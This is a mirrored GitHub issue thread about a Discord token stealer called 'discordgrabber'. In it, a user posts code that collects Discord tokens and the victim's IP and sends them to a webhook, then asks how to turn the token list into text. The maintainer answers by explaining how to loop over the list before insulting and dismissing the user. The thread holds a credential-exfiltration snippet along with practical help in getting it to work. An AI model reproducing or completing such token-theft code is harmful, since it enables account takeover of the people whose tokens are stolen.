GithubHelp home page GithubHelp logo

Comments (5)

MoistCoder avatar MoistCoder commented on August 26, 2024

What you are saying makes no sense. When calling the method GetTokens() you should get nothing as it doesn't access your output. You probably just used DiscordGrabber.GetTokens().ToString() which resulted in your output is that right?

from discordgrabber.

Zordon1337 avatar Zordon1337 commented on August 26, 2024

i used

var token = DiscordGrabber.GetTokens();

dcWeb.SendMessage("IP: " + data2 + "\ntoken: " + token);

i want to know how to get token to string

from discordgrabber.

MoistCoder avatar MoistCoder commented on August 26, 2024

GetTokens()'s return type is List<string>. Lists are basic knowledge, so I assume you're a skid, but anyway:
You will need to loop through the list to get all values (like in the example I provided in the Readme):

foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);

You can also use a for or while loop

from discordgrabber.

Zordon1337 avatar Zordon1337 commented on August 26, 2024

i'm not skid but sometimes i'm using someone src. most of my project are coded by me. i still don't have idea how to fix.
after using foreach it doesn't anymore sends the webhook

from discordgrabber.

MoistCoder avatar MoistCoder commented on August 26, 2024

i'm not skid but sometimes i'm using someone src.

That is a blatant lie. Every C# developer knows what lists are and how loops work.

i still don't have idea how to fix.
after using foreach it doesn't anymore sends the webhook

Hahaha, you probably just copied the example into your code LMAO. Whatever kid don't waste my time. I know you just searched for a discord token stealer to modify a small amount of its code so you can claim it as yours. You don't know C# let alone English. I'm not gonna help skids.

from discordgrabber.

Related Issues (1)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.